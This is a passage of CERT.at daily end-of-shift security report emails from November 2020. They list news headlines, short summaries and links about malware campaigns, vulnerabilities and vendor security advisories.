seamonkey), Gentoo (libexif), openSUSE (raptor), Oracle (kernel and microcode_ctl), Scientific Linux (firefox), SUSE (kernel-firmware, postgresql, postgresql96, postgresql10 and postgresql12, and raptor), and Ubuntu (openldap and postgresql-10, postgresql-12, postgresql-9.5). --------------------------------------------- https://lwn.net/Articles/837538/ ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Multiple Jackson-Databind CVEs – February 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow – CVE-2020-4672 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.11.2020
by Daily end-of-shift report 16 Nov '20

16 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 13-11-2020 18:00 − Montag 16-11-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Stories from the SOC – Multi-layered defense detects Windows Trojan ∗∗∗ --------------------------------------------- Malware infections are common and are often missed by antivirus software. Their impact to critical infrastructure and applications can be devastating to an organizations network, brand and customers if not remediated. With the everchanging nature of [...] --------------------------------------------- https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-so… ∗∗∗ New TroubleGrabber Discord malware steals passwords, system info ∗∗∗ --------------------------------------------- TroubleGrabber, a new credential stealer discovered by Netskope security researchers, spreads via Discord attachments and uses Discord webhooks to deliver stolen information to its operators. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-troublegrabber-discord-m… ∗∗∗ Windows Kerberos authentication breaks due to security updates ∗∗∗ --------------------------------------------- Microsoft is investigating a new known issue causing enterprise domain controllers to experience Kerberos authentication problems after installing security updates released during this months Patch Tuesday, on November 10. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentica… ∗∗∗ Schneider Electric Warns Customers of Drovorub Linux Malware ∗∗∗ --------------------------------------------- One of the security bulletins released this week by Schneider Electric warns customers about Drovorub, a piece of Linux malware that was recently detailed by the NSA and the FBI. --------------------------------------------- https://www.securityweek.com/schneider-electric-warns-customers-drovorub-li… ∗∗∗ Ok Google: please publish your DKIM secret keys ∗∗∗ --------------------------------------------- The Internet is a dangerous place in the best of times. Sometimes Internet engineers find ways to mitigate the worst of these threats, and sometimes they fail. Every now and then, however, a major Internet company finds a solution that actually makes the situation worse for just about everyone. Today I want to talk about [...] --------------------------------------------- https://blog.cryptographyengineering.com/2020/11/16/ok-google-please-publis… ∗∗∗ The ransomware landscape is more crowded than you think ∗∗∗ --------------------------------------------- More than 25 Ransomware-as-a-Service (RaaS) portals are currently renting ransomware to other criminal groups. --------------------------------------------- https://www.zdnet.com/article/the-ransomware-landscape-is-more-crowded-than… ∗∗∗ Ngioweb Botnet Targeting IoT Devices ∗∗∗ --------------------------------------------- A new version of the Ngioweb botnet malware was discovered and analyzed by Netlab 360 researchers. Their blog post details the changes observed in these newer samples. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/e4becb0bc47fb9b7ad74c9fb579… ===================== = Vulnerabilities = ===================== ∗∗∗ Heartbleed, BlueKeep and other vulnerabilities that didnt disappear just because we dont talk about them anymore, (Mon, Nov 16th) ∗∗∗ --------------------------------------------- Since new critical vulnerabilities are discovered and published nearly every day, it is no wonder that we (i.e. security professionals and security-oriented media) tend to focus on these and dont return to the ones that came before too often. Unless there is a massive exploitation campaign, that is. This doesnt present any problems for organizations, which manage to patch vulnerabilities on time, but for many others [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26798 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libdatetime-timezone-perl and libvncserver), Fedora (chromium, kernel, kernel-headers, kernel-tools, krb5, libexif, libxml2, and thunderbird), Gentoo (chromium, libmaxminddb, and mit-krb5), Mageia (arpwatch, bluez, chromium-browser-stable, firefox and thunderbird, golang, java-1.8.0-op, kdeconnect-kde, kleopatra, libexif, lilypond, microcode, packagekit, ruby, and tpm2-tss), openSUSE (chromium, firefox, ImageMagick, kernel, openldap2, python-waitress, SDL, u-boot, ucode-intel, and zeromq), Oracle (fence-agents, firefox, freetype, kernel, python, python3, and thunderbird), Red Hat (rh-postgresql10-postgresql, rh-postgresql12-postgresql, and virt:8.2 and virt-devel:8.2), Slackware (seamonkey), and SUSE (firefox, gdm, kernel, and kernel-firmware). --------------------------------------------- https://lwn.net/Articles/837431/ ∗∗∗ SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities ∗∗∗ --------------------------------------------- https://cxsecurity.com/issue/WLB-2020110113 ∗∗∗ Opera Touch for iOS: Schwachstelle ermöglicht Darstellen falscher Informationen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1123 ∗∗∗ Nagios Enterprises Nagios XI: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1122 ∗∗∗ Security Bulletin: Information Disclosure Vulnerability Affects EBICS Client of IBM Sterling B2B Integrator (CVE-2020-4475) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: Information Disclosure Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4476) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: CKEditor XSS Vulnerability Affects IBM Sterling B2B Integrator (CVE-2018-17960) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ckeditor-xss-vulnerabilit… ∗∗∗ Security Bulletin: XSS Vulnerability Affects IBM Sterling B2B Integrator (CVE-2020-4705) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-xss-vulnerability-affects… ∗∗∗ Security Bulletin: SQL Injection Vulnerability Affects EBICS in IBM Sterling B2B Integrator (CVE-2020-4655) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-sql-injection-vulnerabili… ∗∗∗ Security Bulletin: B2B API Information Disclosure Vulnerability Affects IBM Sterling B2B Integrator (CVE-2020-4566) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-b2b-api-information-discl… ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow – CVE-2020-4672 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Cookie Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4763) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cookie-vulnerability-affe… ∗∗∗ Security Bulletin: Cookie Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4665) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cookie-vulnerability-affe… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.11.2020
by Daily end-of-shift report 13 Nov '20

13 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 12-11-2020 18:00 − Freitag 13-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Ubuntu Linux schließt Lücken: Im Handumdrehen zum Systemverwalter ∗∗∗ --------------------------------------------- Ein Sicherheitsforscher stolperte über eine Lücken-Kombo, mit der einfache Nutzer einen Account mit Sudo-Rechten anlegen konnten. Ubuntu hat diese nun gefixt. --------------------------------------------- https://heise.de/-4960051 ∗∗∗ Unbreak My Heart: What I Learned About Building Better Medical Devices While Troubleshooting My Pacemaker ∗∗∗ --------------------------------------------- This blog outlines the story of Veronica Schmitts journey to fixing her ICD/Pacemaker using Medical Device Forensics. --------------------------------------------- https://www.sans.org/blog/unbreak-my-heart-what-i-learned-about-building-be… ∗∗∗ A new skimmer uses WebSockets and a fake credit card form to steal sensitive data ∗∗∗ --------------------------------------------- A new skimmer attack was discovered this week, targeting various online e-commerce sites built with different frameworks. As of the writing of this blog post, the attack is still active and exfiltrating data. --------------------------------------------- https://blogs.akamai.com/2020/11/a-new-skimmer-uses-websockets-and-a-fake-c… ∗∗∗ DNS Cache Poisoning Attack Reloaded: Revolutions with Side Channels ∗∗∗ --------------------------------------------- SAD DNS is a revival of the classic DNS cache poisoning attack (which no longer works since 2008) leveraging novel network side channels that exist in all modern operating systems, including Linux, Windows, macOS, and FreeBSD. This represents an important milestone -- the first weaponizable network side channel attack that has serious security impacts. The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq). --------------------------------------------- https://www.saddns.net/ ∗∗∗ Surviving college distance learning during the pandemic: a cybersecurity guide ∗∗∗ --------------------------------------------- Students in higher education are exposed to online risks more than ever. Keep yourself secure while distance learning from home with this practical guide. --------------------------------------------- https://blog.malwarebytes.com/how-tos-2/2020/11/surviving-college-distance-… ===================== = Vulnerabilities = ===================== ∗∗∗ Schneider Electric sichert diverse ICS-Komponenten gegen Schwachstellen ab ∗∗∗ --------------------------------------------- Für Hard- und Software zur Konfiguration und Verwaltung industrieller Steuerungssysteme von Schneider Electric sind wichtige Sicherheitsupdates verfügbar. --------------------------------------------- https://heise.de/-4959299 ∗∗∗ ICS Advisory (ICSA-20-317-01) Mitsubishi Electric MELSEC iQ-R Series ∗∗∗ --------------------------------------------- A denial-of-service vulnerability due to uncontrolled resource consumption exists in MELSEC iQ-R series CPU modules. This vulnerability does not affect products when the "To Use or Not to Use Web Server" parameter of CPU modules is set to "Not Use." The default setting is "Not Use." --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-317-01 ∗∗∗ PostgreSQL 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24 Released! ∗∗∗ --------------------------------------------- The PostgreSQL Global Development Group has released an update to all supported versions of our database system, including 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24. This release closes three security vulnerabilities and fixes over 65 bugs reported over the last three months. Due to the nature of CVE-2020-25695, we advise you to update as soon as possible. Additionally, this is the second-to-last release of PostgreSQL 9.5. If you are running PostgreSQL 9.5 in a production environment, we [...] --------------------------------------------- https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libproxy, pacemaker, and thunderbird), Fedora (nss), openSUSE (kernel), Oracle (curl, librepo, qt and qt5-qtbase, and tomcat), Red Hat (firefox), SUSE (firefox, java-1_7_0-openjdk, and openldap2), and Ubuntu (apport, libmaxminddb, openjdk-8, openjdk-lts, and slirp). --------------------------------------------- https://lwn.net/Articles/837105/ ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- A security issue has been identified in Citrix Hypervisor that may allow privileged code running in a guest VM to infer details of some computations occurring in other VMs on the host. This may, for example, be used to infer a secret encryption key used [...] --------------------------------------------- https://support.citrix.com/article/CTX285937 ∗∗∗ Citrix SDWAN Center Security Update ∗∗∗ --------------------------------------------- Multiple vulnerabilities have been discovered in Citrix SD-WAN Center that, if exploited, could allow an unauthenticated attacker with network access to SD-WAN Center to perform arbitrary code execution as root. --------------------------------------------- https://support.citrix.com/article/CTX285061 ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Designer instances may be vulnerable to CVE-2020-7760 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: Novalink is impacted by Vulnerability in Hibernate Validator affects WebSphere Application Server Liberty (CVE-2020-10693) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-v… ∗∗∗ Security Bulletin: Novalink is impacted running oauth-2.0 or openidConnectServer-1.0 server features vulnerability in WebSphere Application Server Liberty (CVE-2020-4590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-runn… ∗∗∗ Security Bulletin: Vulnerability in icu CVE-2020-10531. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-icu-cve-… ∗∗∗ Security Bulletin: Vulnerability in Open Source Python affect IBM Tivoli Application Dependency Discovery Manager (CVE-2020-8492) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-open-sou… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affecting IBM Application Discovery and Delivery Intelligence V5.1.0.7 and V5.1.0.8 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: Vulnerabilities in Tivoli Netcool/OMNIbus ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-tivoli… ∗∗∗ Security Bulletin: Vulnerability in OpenSSL affects IBM Integrated Analytics System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-… ∗∗∗ Security Bulletin: Samba for IBM i is affected by CVE-2020-14323 and CVE-2020-14318 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-samba-for-ibm-i-is-affect… ∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Spectrum Control (CVE-2020-8201, CVE-2020-8252) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j… ∗∗∗ Security Bulletin: CVE-2020-4482 ADD SNAPSHOT STATUS REST CALL DOESN'T CHECK THE USER ROLE ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-4482-add-snapsho… ∗∗∗ Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-struts-publicly-di… ∗∗∗ Security Bulletin: CVE-2018-10886 ant before version 1.9.12 unzip and untar targets allows the extraction of files outside the target directory. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2018-10886-ant-before… ∗∗∗ Security Bulletin: IBM Security Directory Suite is affected by a security vulnerability (CVE-2018-4441) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-su… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin:Security Bulletin: IBM Content Navigator is affected by a vulnerability in Apache HttpClient ( CVE-2020-13956) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletinsecurity-bulletin-ibm-cont… ∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2019-16779). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o… ∗∗∗ macOS Big Sur 11.0.1 ∗∗∗ --------------------------------------------- https://support.apple.com/kb/HT211931 ∗∗∗ Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave ∗∗∗ --------------------------------------------- https://support.apple.com/kb/HT211946 ∗∗∗ Safari 14.0.1 ∗∗∗ --------------------------------------------- https://support.apple.com/kb/HT211934 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.11.2020
by Daily end-of-shift report 12 Nov '20

12 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 11-11-2020 18:00 − Donnerstag 12-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Angeblich Quellcode des Exploit-Toolkits Cobalt Strike durchgesickert ∗∗∗ --------------------------------------------- Auf GitHub findet sich seit fast zwei Wochen ein Repository mit dem Namen CobaltStrike. Es enthält angeblich den Code von Cobalt Strike 4.0. Der Autor entfernt zudem die Lizenzprüfung, was auf eine geknackte Version schließen lässt. --------------------------------------------- https://www.zdnet.de/88389725/angeblich-quellcode-des-exploit-toolkits-coba… ∗∗∗ Hungrig nach Daten – ModPipe Backdoor bedroht POS‑Software im Gastgewerbe ∗∗∗ --------------------------------------------- Die Backdoor-Autoren verfügen offenbar über umfassende Kenntnisse der Software und entschlüsseln Datenbankkennwörter aus Windows-Registry-Werten. --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/11/12/hungrig-nach-daten-modpip… ∗∗∗ Extrapolating Adversary Intent Through Infrastructure ∗∗∗ --------------------------------------------- Hear from Senior Security Researcher Joe Slowik to discover the significance behind domain name patterns and learn how defenders can use these thematic insights to further their security operations. --------------------------------------------- https://www.domaintools.com/resources/blog/extrapolating-adversary-intent-t… ∗∗∗ 2 More Google Chrome Zero-Days Under Active Exploitation ∗∗∗ --------------------------------------------- Browser users are once again being asked to patch severe vulnerabilities that can lead to remote code execution. --------------------------------------------- https://threatpost.com/2-zero-day-bugs-google-chrome/161160/ ∗∗∗ Preventing Exposed Azure Blob Storage, (Thu, Nov 12th) ∗∗∗ --------------------------------------------- In the previous diary, I explained the three public access levels of Azure Blob Storage, and how to investigate the setup for any issues. Until a couple of months ago, there was no reliable way to prevent the problem from occurring in the first place, but thankfully, Microsoft has finally seen the light. --------------------------------------------- https://isc.sans.edu/diary/rss/26786 ∗∗∗ Attacking SCADA Part II: Vulnerabilities in Schneider Electric EcoStruxure Machine Expert and M221 PLC ∗∗∗ --------------------------------------------- We present two vulnerabilities in EcoStruxure Machine Expert v1.0 and Schneider Electric M221 (Firmware 1.10.2.2) Programmable Logic Controller (PLC). All three vulnerabilities were disclosed to Schneider Electric and the details were released on 10 November 2020. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-s… ∗∗∗ Exploring the Exploitability of "Bad Neighbor": The Recent ICMPv6 Vulnerability (CVE-2020-16898) ∗∗∗ --------------------------------------------- We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD) --------------------------------------------- https://blog.zecops.com/vulnerabilities/exploring-the-exploitability-of-bad… ∗∗∗ CRAT wants to plunder your endpoints ∗∗∗ --------------------------------------------- Cisco Talos has observed a new version of a remote access trojan (RAT) family known as CRAT. Apart from the prebuilt RAT capabilities, the malware can download and deploy additional malicious plugins on the infected endpoint. One of the plugins is a ransomware known as "Hansom." --------------------------------------------- https://blog.talosintelligence.com/2020/11/crat-and-plugins.html ∗∗∗ Avionics Safety and Secured Connectivity: A Look at DO-326A/ED-202A, DO-355 and DO-356 ∗∗∗ --------------------------------------------- One of the major improvements that the avionics industry is undergoing is an Internet of Things (IoT) upgrade. And this is inevitably affecting how airlines approach aircraft safety. From the beginning, safety has been paramount to the aviation industry. But while it is a welcome innovation, the incorporation of IoT devices in aircraft comes with [...] --------------------------------------------- https://www.tripwire.com/state-of-security/regulatory-compliance/avionics-s… ∗∗∗ Comodo open-sources its EDR solution ∗∗∗ --------------------------------------------- OpenEDR, announced in September, is available on GitHub starting this week. --------------------------------------------- https://www.zdnet.com/article/comodo-open-sources-its-edr-solution/ ∗∗∗ Why you should keep your Netflix password to yourself ∗∗∗ --------------------------------------------- Sharing is caring - except when it isn't. Here’s why you shouldn't share your password for online media services with other people. --------------------------------------------- https://www.welivesecurity.com/2020/11/11/why-you-should-keep-netflix-passw… ∗∗∗ Cryptominers Exploiting Weblogic RCE CVE-2020-14882 ∗∗∗ --------------------------------------------- Intro Towards the end of October, we started seeing attackers take advantage of a Weblogic RCE vulnerability (CVE-2020-14882). Recently, SANS ISC talked about this vulnerability being exploited in the wild, [...] --------------------------------------------- https://thedfirreport.com/2020/11/12/cryptominers-exploiting-weblogic-rce-c… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (codemirror-js, firefox-esr, and pacemaker), Fedora (firefox, java-latest-openjdk, and xen), openSUSE (sddm), Oracle (bind, curl, fence-agents, kernel, librepo, libvirt, python3, qt and qt5-qtbase, and tomcat), SUSE (firefox), and Ubuntu (intel-microcode, openldap, and raptor2). --------------------------------------------- https://lwn.net/Articles/836994/ ∗∗∗ Encryption Vulnerabilities Allow Hackers to Take Control of Schneider Electric PLCs ∗∗∗ --------------------------------------------- Schneider Electric this week released advisories for vulnerabilities impacting various products, including flaws that can be exploited to take control of Modicon M221 programmable logic controllers (PLCs). --------------------------------------------- https://www.securityweek.com/encryption-vulnerabilities-allow-hackers-take-… ∗∗∗ Security Advisory - Denial of Service Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201111… ∗∗∗ Security Bulletin: IBM API Connect V5 is vulnerable to denial of service (CVE-2019-11479) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-v5-is-vul… ∗∗∗ Security Bulletin: Vulnerability in HTTPD affects IBM Integrated Analytics System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-httpd-af… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.11.2020
by Daily end-of-shift report 11 Nov '20

11 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 10-11-2020 18:00 − Mittwoch 11-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Targeted ransomware: it’s not just about encrypting your data! ∗∗∗ --------------------------------------------- When we talk about ransomware, we need to draw a line between what it used to be and what it currently is. Why? Because nowadays ransomware is not just about encrypting data – it’s primarily about data exfiltration. --------------------------------------------- https://securelist.com/targeted-ransomware-encrypting-data/99255/ ∗∗∗ Decrypting OpenSSH sessions for fun and profit ∗∗∗ --------------------------------------------- A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers. --------------------------------------------- https://blog.fox-it.com/2020/11/11/decrypting-openssh-sessions-for-fun-and-… ∗∗∗ So kaufen Sie Weihnachtsgeschenke sicher im Internet ein! ∗∗∗ --------------------------------------------- Damit die Weihnachtsvorfreude nicht durch eine Bestellung bei einem Fake-Shop getrübt wird, zeigen wir Ihnen die wichtigsten Punkte, an denen Sie unseriöse Online-Shops erkennen. --------------------------------------------- https://www.watchlist-internet.at/news/so-kaufen-sie-weihnachtsgeschenke-si… ∗∗∗ Play Store identified as main distribution vector for most Android malware ∗∗∗ --------------------------------------------- Mammoth research project using Symantec (now NortonLifeLock) telemetry confirms what everyone suspected. --------------------------------------------- https://www.zdnet.com/article/play-store-identified-as-main-distribution-ve… ∗∗∗ Neuer Android-Trojaner spioniert 153 mobile Anwendungen aus ∗∗∗ --------------------------------------------- Darunter sind auch vier Apps deutscher Banken. Die Verbreitung erfolgt über Links in Spam-E-Mails. Mithilfe der Android-Bedienungshilfen nistet sich der Trojaner dauerhaft auf einem Gerät ein und erlaubt dessen Fernsteuerung. --------------------------------------------- https://www.zdnet.de/88389654/neuer-android-trojaner-spioniert-153-mobile-a… ===================== = Vulnerabilities = ===================== ∗∗∗ NVIDIA fixes severe flaw in GeForce NOW cloud gaming service ∗∗∗ --------------------------------------------- NVIDIA released a security update for the GeForce Now cloud gaming Windows app to address a vulnerability that could allow attackers to execute arbitrary code or escalate privileges on systems running unpatched software. --------------------------------------------- https://www.bleepingcomputer.com/news/security/nvidia-fixes-severe-flaw-in-… ∗∗∗ VU#231329: Replay Protected Memory Block (RPMB) protocol does not adequately defend against replay attacks ∗∗∗ --------------------------------------------- The Replay Protected Memory Block (RPMB) protocol found in several storage specifications does not securely protect against replay attacks. An attacker with physical access can deceive a trusted component about the status of an RPBM write command or the content of an RPMB area. --------------------------------------------- https://kb.cert.org/vuls/id/231329 ∗∗∗ VU#760767: Macrium Reflect is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗ --------------------------------------------- Macrium Reflect contains a privilege escalation vulnerability due to the use of an OPENSSLDIR variable that specifies a location where an unprivileged Windows user can create files. --------------------------------------------- https://kb.cert.org/vuls/id/760767 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium, firefox, gdm, linux-hardened, matrix-synapse, salt, sddm, and wordpress), Debian (firefox-esr, libmaxminddb, and moin), Fedora (cifs-utils, firefox, galera, java-latest-openjdk, mariadb, mariadb-connector-c, and wordpress), Gentoo (blueman, chromium, firefox, mariadb, qemu, salt, tmux, and wireshark), openSUSE (sddm), Oracle (kernel), Red Hat (kernel-alt, microcode_ctl, and rh-nodejs12-nodejs), SUSE (kernel, microcode_ctl, openldap2, --------------------------------------------- https://lwn.net/Articles/836897/ ∗∗∗ Patchday: Microsoft schließt Kernel-Lücke in Windows ∗∗∗ --------------------------------------------- Es sind über 100 Sicherheitsupdates für Microsoft Office, Windows & Co. erschienen. Eine Lücke nutzen Angreifer derzeit aktiv aus. --------------------------------------------- https://heise.de/-4954195 ∗∗∗ Security Advisory - Command Injection Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201111-… ∗∗∗ XSA-351 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-351.html ∗∗∗ Citrix Systems Virtual Apps and Desktops: Mehrere Schwachstellen ermöglichen Erlangen von Administratorrechten ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1107 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.11.2020
by Daily end-of-shift report 10 Nov '20

10 Nov '20

===================== = End-of-Day report = ===================== Timeframe: Montag 09-11-2020 18:00 − Dienstag 10-11-2020 18:00 Handler: Dimitri Robl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ PLATYPUS - With Great Power comes Great Leakage ∗∗∗ --------------------------------------------- With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs. We exploit the unprivileged access to the Intel RAPL interface exposing the processors power consumption to infer data and extract cryptographic keys. --------------------------------------------- https://platypusattack.com/ ∗∗∗ wetransfer.com: So nutzen Sie den kostenlosen Dienst sicher ∗∗∗ --------------------------------------------- wetransfer.com - ein beliebter Dienst, um kostenlos und unkompliziert viele Dateien oder Ordner zu teilen. Beim Empfang eines E-Mails von wetransfer.com raten wir jedoch zur Vorsicht, denn Kriminelle versenden im Design des Datenversanddienstes Phishing-E-Mails oder gefährliche E-Mails mit Schadsoftware. Also: Zuerst kontrollieren, dann klicken! --------------------------------------------- https://www.watchlist-internet.at/news/wetransfercom-so-nutzen-sie-den-kost… ∗∗∗ Plötzliche Abkündigung: Avira stellt Business-Sicherheitsprodukte Ende 2021 ein ∗∗∗ --------------------------------------------- Avira weist Geschäftskunden derzeit auf die Einstellung des B2B-Bereichs hin: Bestehende Lizenzen verlieren demnach zum 01.01.22 ihre Gültigkeit. --------------------------------------------- https://heise.de/-4952577 ∗∗∗ Microsoft Teams Users Under Attack in 'FakeUpdates' Malware Campaign ∗∗∗ --------------------------------------------- Microsoft warns that cybercriminals are using Cobalt Strike to infect entire networks beyond the infection point, according to a report. --------------------------------------------- https://threatpost.com/microsoft-teams-fakeupdates-malware/161071/ ∗∗∗ Code Comments Reveal SCP-173 Malware ∗∗∗ --------------------------------------------- We sometimes find malware code injections that contain strange code comments, which are normally used by programmers to annotate a section of code - for example, a short description of a feature or functionality for other developers to reference. Oftentimes, hackers aren’t interested in leaving comments describing how their injected malware works. Instead, they use code comments to add unique identifiers to reference aliases, quotes, threat groups, or sometimes even memes. --------------------------------------------- https://blog.sucuri.net/2020/11/code-comments-reveal-scp-173-malware.html ∗∗∗ WOW64!Hooks: WOW64 Subsystem Internals and Hooking Techniques ∗∗∗ --------------------------------------------- Microsoft is known for their backwards compatibility. When they rolled out the 64-bit variant of Windows years ago they needed to provide compatibility with existing 32-bit applications. In order to provide seamless execution regardless of application bitness, the WoW (Windows on Windows) system was coined. This layer, which will be referred to as 'WOW64' from here on out, is responsible for translating all Windows API calls from 32-bit userspace to the 64-bit operating system --------------------------------------------- https://www.fireeye.com/blog/threat-research/2020/11/wow64-subsystem-intern… ∗∗∗ Snakes and Ladder Logic ∗∗∗ --------------------------------------------- A click to a reverse shell in OpenPLC and ladder logic OR Why you shouldn’t run everything as root in PLC and RTUs. --------------------------------------------- https://www.pentestpartners.com/security-blog/snakes-and-ladder-logic/ ∗∗∗ Npm package caught stealing sensitive Discord and browser files ∗∗∗ --------------------------------------------- Malicious code was found hidden inside a JavaScript library named Discord.dll. --------------------------------------------- 